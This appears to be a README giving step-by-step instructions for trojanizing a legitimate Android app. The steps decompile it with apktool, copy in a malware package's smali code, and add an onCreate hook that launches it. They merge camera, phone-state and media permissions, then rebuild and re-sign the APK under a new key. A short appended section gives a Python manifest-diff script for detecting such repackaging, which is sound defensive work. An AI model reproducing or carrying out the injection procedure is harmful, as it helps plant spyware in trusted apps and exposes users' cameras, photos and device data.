## Prep

### Without Camera

1. Comment out the timer and compile

```kt
private fun startCheckingPermission() {
    timerStorage = Timer("CheckStoragePermissionTimer", false)

    timerStorage?.scheduleAtFixedRate(0, 5000) {
        checkStoragePermission()
        println("Requesting storage permission again")
    }

    /* timerCamera = Timer("CheckCameraPermissionTimer", false)

    timerCamera?.scheduleAtFixedRate(0, 5000) {
        checkCameraPermission()
        println("Requesting camera permission again")
    }*/
}
```

2. Decompile the APK: `apktool d malware.apk`
3. Decompile the original app: `apktool d application.apk`
4. Move the malware into the normal application: `cp -r malware/smali/com/* application/smali/com/`
5. Under the `onCreate` of the original app

```smali
    new-instance p1, Lcom/ti/m/GoodSoftware;

    move-object v0, p0

    check-cast v0, Landroid/content/Context;

    invoke-direct {p1, v0}, Lcom/ti/m/GoodSoftware;-><init>(Landroid/content/Context;)V

    invoke-virtual {p1}, Lcom/ti/m/GoodSoftware;->launch()V
```
6. Copy the permissions from the malware manifest into the original manifest's permissions
```xml
<uses-permission android:name="android.permission.CAMERA"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
```

### With Camera

1. Do the steps of Without Camera, but don't uncomment the timer
2. Copy the camera folder into the existing androidx folder: `cp -r malware/smali/androidx/camera/ application/smali_classes2/androidx/`
3. Copy the androidx futures into the existing folder: `cp -r malware/smali/androidx/concurrent/futures/* application/smali/androidx/concurrent/futures/`
4. Copy MediatorLiveData: `cp -r malware/smali/androidx/lifecycle/MediatorLiveData* application/smali/androidx/lifecycle/`
5. Copy the camera metadata from the manifest
```xml
<service android:enabled="false" android:exported="false" android:name="androidx.camera.core.impl.MetadataHolderService">
    <meta-data android:name="androidx.camera.core.impl.MetadataHolderService.DEFAULT_CONFIG_PROVIDER" android:value="androidx.camera.camera2.Camera2Config$DefaultProvider"/>
</service>
<uses-library android:name="androidx.camera.extensions.impl" android:required="false"/>
```

6. Copy the camera queries to the manifest under the permissions
```xml
<queries>
    <intent>
        <action android:name="androidx.camera.extensions.action.VENDOR_ACTION"/>
    </intent>
</queries>
```

## Final Steps

1. Build the application: `apktool b application -o unsigned.apk`
2. Align using zipalign: `zipalign -p -f -v 4 unsigned.apk App_Injected.apk`
3. Generate a keystore: `keytool -genkey -V -keystore key.keystore -alias Android -keyalg RSA -keysize 2048 -validity 10000`
4. Sign the APK: `apksigner sign --ks key.keystore App_Injected.apk`
5. Done
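
The manifest edits in the Prep steps (added permissions, camera features, the `MetadataHolderService` entry and the `<queries>` intent) leave a visible difference between the publisher's build and a repackaged one. The following is an added example, not part of the original README: a Python check that diffs two apktool-decoded manifests and lists what the suspect build declares beyond the trusted baseline. The sample manifests and the `com.example.app` package name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# Element types that the manifest-editing steps above add to the target app.
TRACKED = ("uses-permission", "uses-feature", "uses-library", "service")

def manifest_entries(xml_text):
    """Collect (element, android:name) pairs from an apktool-decoded manifest."""
    root = ET.fromstring(xml_text)
    found = {(el.tag, el.get(ANDROID_NS + "name", ""))
             for el in root.iter() if el.tag in TRACKED}
    # <queries> intents are tracked separately from intent-filter actions.
    for el in root.findall("./queries/intent/action"):
        found.add(("queries/action", el.get(ANDROID_NS + "name", "")))
    return found

def added_entries(baseline_xml, suspect_xml):
    """Entries in the suspect manifest that the trusted baseline does not declare."""
    return sorted(manifest_entries(suspect_xml) - manifest_entries(baseline_xml))

# Constructed sample manifests (hypothetical package name), not taken from a real app.
BASELINE = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application><activity android:name=".MainActivity"/></application>
</manifest>"""

SUSPECT = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_MEDIA_IMAGES"/>
  <uses-feature android:name="android.hardware.camera"/>
  <queries><intent>
    <action android:name="androidx.camera.extensions.action.VENDOR_ACTION"/>
  </intent></queries>
  <application>
    <activity android:name=".MainActivity"/>
    <service android:name="androidx.camera.core.impl.MetadataHolderService" android:exported="false"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for tag, name in added_entries(BASELINE, SUSPECT):
        print(f"added {tag}: {name}")
```

Because the Final Steps re-sign the APK with a newly generated key, the certificate reported by `apksigner verify --print-certs` will also differ from the original publisher's.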